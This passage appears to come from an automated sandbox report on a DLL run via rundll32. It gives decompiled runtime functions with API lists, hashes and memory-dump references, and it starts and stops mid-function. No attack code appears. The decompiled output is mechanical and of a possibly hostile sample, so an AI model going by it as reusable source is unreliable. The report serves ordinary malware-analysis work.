				if(_a4 != 0) {
					E6F34476F(_t45, 7);
					E6F34476F(_t45 + 0x1c, 7);
					E6F34476F(_t45 + 0x38, 0xc);
					E6F34476F(_t45 + 0x68, 0xc);
					E6F34476F(_t45 + 0x98, 2);
					E6F33FEFF( *((intOrPtr*)(_t45 + 0xa0)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0xa4)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0xa8)));
					E6F34476F(_t45 + 0xb4, 7);
					E6F34476F(_t45 + 0xd0, 7);
					E6F34476F(_t45 + 0xec, 0xc);
					E6F34476F(_t45 + 0x11c, 0xc);
					E6F34476F(_t45 + 0x14c, 2);
					E6F33FEFF( *((intOrPtr*)(_t45 + 0x154)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0x158)));
					E6F33FEFF( *((intOrPtr*)(_t45 + 0x15c)));
					return E6F33FEFF( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6F34476F: _free.LIBCMT ref: 6F344794

_free.LIBCMT ref: 6F3447F5

Part of subcall function 6F33FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F344800
_free.LIBCMT ref: 6F34480B
_free.LIBCMT ref: 6F34485F
_free.LIBCMT ref: 6F34486A
_free.LIBCMT ref: 6F344875
_free.LIBCMT ref: 6F344880

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0779c2e4d56e3e30a940d228595ad2773c700ad36579aa28866cdfec2d56c8f4
Instruction ID: dcac1134fe65fe879e8bcca06ee93b64a2c8ef964bbb42740c435b160a1537b9
Opcode Fuzzy Hash: 0779c2e4d56e3e30a940d228595ad2773c700ad36579aa28866cdfec2d56c8f4
Instruction Fuzzy Hash: 40118E32940B84EBD620EBB0CD05FCF7BDDAF81754F800A25B6E9A61E1EB35B5058650

Uniqueness

Uniqueness Score: -1.00%

Function 6F34312B, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6F34312B(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0x6f36609c; // 0xe6b94de
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t282;
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 +  *((intOrPtr*)(0x6f37e428 + _t246 * 4)) + 0x18));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E6F33EA98( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6f37e428 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x6f3667f0)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x6f37e428 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x6f3667f0)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0x6f37e428 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E6F33DD40( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0x6f37e428 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6F344104(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E6F3427A9(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E6F342E16(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x6f37e428 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0x6f37e428 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x6f37e428 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E6F340CDA( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6F340CDA();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6F33C65E(_v8 ^ _t294);
			}

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6F343173
__fassign.LIBCMT ref: 6F343352
__fassign.LIBCMT ref: 6F34336F
WriteFile.KERNEL32(?,6F3407E3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3433B7
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F3433F7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F3434A3

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: b5f0fe09be84fdecc32608b0b7aae92354bb408cccc0c528f466c9f83e70e0d9
Instruction ID: ff8971410956237dcd83287d6418eaf3a5583b91c5fd18bd8da8759ae2372e63
Opcode Fuzzy Hash: b5f0fe09be84fdecc32608b0b7aae92354bb408cccc0c528f466c9f83e70e0d9
Instruction Fuzzy Hash: 4FD18775D002589FDB11CFA8C8819EDBBF9EF49324F24016AE855FB341D631AA46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F33D7C6, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F33D7C6(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x6f3660c0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E6F33DAD7(__eflags,  *0x6f3660c0);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6F33DB12(__eflags,  *0x6f3660c0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t28 = E6F33FE6C(_t16);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6F33DB12(__eflags,  *0x6f3660c0, 0);
								} else {
									__eflags = E6F33DB12(__eflags,  *0x6f3660c0, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6F33E93F(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,6F33D578,6F33CC5A,6F33C7BB,?,6F33C9D8,?,00000001,?,?,00000001,?,6F364F78,0000000C,6F33CACC), ref: 6F33D7D4
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F33D7E2
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F33D7FB
SetLastError.KERNEL32(00000000,6F33C9D8,?,00000001,?,?,00000001,?,6F364F78,0000000C,6F33CACC,?,00000001,?), ref: 6F33D84D

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 234c1ba26418362c9b1e00df07a0c225405981452aae264915783fafa3c7fb3e
Instruction ID: d9ed62cd684d1e2314433bc42ea4a6bc2be30e1454e0545abc3bd87ab5126c31
Opcode Fuzzy Hash: 234c1ba26418362c9b1e00df07a0c225405981452aae264915783fafa3c7fb3e
Instruction Fuzzy Hash: B201FC33A0DBB96E970499786C45A572B6EEF437B9720033EF5514E1D0EF2368549290

Uniqueness

Uniqueness Score: -1.00%

Function 6F341D1D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F341D1D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6F3427A9(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6F3427A9(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6F34016E(GetLastError());
									_t17 =  *((intOrPtr*)(E6F3401A4(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6F341DE4(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6F34016E(GetLastError());
						_t17 =  *((intOrPtr*)(E6F3401A4(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6F341DE4(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6F341E0B(_a8);
				return 0;
			}

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F341D22

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 4979c69c0ad183f06ea38e44a1b11ce52a037f2688d2ffed813c03059b76484a
Instruction ID: 22d661fd4da3f2ab4ce5f121b8d72eb67e6f167783baa67e8678c2a98964e41b
Opcode Fuzzy Hash: 4979c69c0ad183f06ea38e44a1b11ce52a037f2688d2ffed813c03059b76484a
Instruction Fuzzy Hash: 5121B0B1204B15BFD722AFA5CD8096B77EDEE023A97004615E854D7590E732EC608BB0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33F49B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6F33F49B(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6f348124(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6f33f4a1
0x6f33f4a5
0x6f33f4b0
0x6f33f4b8
0x6f33f4c3
0x6f33f4c9
0x6f33f4cd
0x6f33f4d4
0x6f33f4da
0x6f33f4da
0x6f33f4dc
0x6f33f4e1
0x00000000
0x6f33f4e6
0x6f33f4ef

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6F33F44D,?,?,6F33F415,?,00000001,?), ref: 6F33F4B0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F33F4C3
FreeLibrary.KERNEL32(00000000,?,?,6F33F44D,?,?,6F33F415,?,00000001,?), ref: 6F33F4E6

Strings

CorExitProcess, xrefs: 6F33F4BB
mscoree.dll, xrefs: 6F33F4A9

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ae0837b93c65aec1b4aca3e5e8a33e7fcf36249ce177917b1448b7fcc6fd7c6f
Instruction ID: bffe762251cb2e5a0fd3d5a6df4beb53f70164436fa7de4ff685f18b5addebf8
Opcode Fuzzy Hash: ae0837b93c65aec1b4aca3e5e8a33e7fcf36249ce177917b1448b7fcc6fd7c6f
Instruction Fuzzy Hash: B2F05832915A28FBDB11ABA0C909BAE7ABDEF05726F014069F904A2190CB718E14DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F344706, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F344706(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6f366790; // 0x6f3667e0
					if(_t23 != 0) {
						E6F33FEFF(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6f366794; // 0x6f37e7e8
					if(_t24 != 0) {
						E6F33FEFF(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6f366798; // 0x6f37e7e8
					if(_t25 != 0) {
						E6F33FEFF(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6f3667c0; // 0x6f3667e4
					if(_t26 != 0) {
						E6F33FEFF(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6f3667c4; // 0x6f37e7ec
					if(_t27 != 0) {
						return E6F33FEFF(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 6F34471E

Part of subcall function 6F33FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F344730
_free.LIBCMT ref: 6F344742
_free.LIBCMT ref: 6F344754
_free.LIBCMT ref: 6F344766

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3e69ae8bc0deedf76d23e95c775d1ecdb12d7117f01fe3d3bb14794f26c24afc
Instruction ID: 67b91356cb007254b582a22fdf147a33c3b8c8129f3a13cb77035d14ac5c7b4d
Opcode Fuzzy Hash: 3e69ae8bc0deedf76d23e95c775d1ecdb12d7117f01fe3d3bb14794f26c24afc
Instruction Fuzzy Hash: 97F09C32904754DB8514DF68D1C1C5F3BDDFB837A07611A1AF469DB940CB31F8404694

Uniqueness

Uniqueness Score: -1.00%

Function 6F341699, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6F341699(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				_t320 = _t131;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
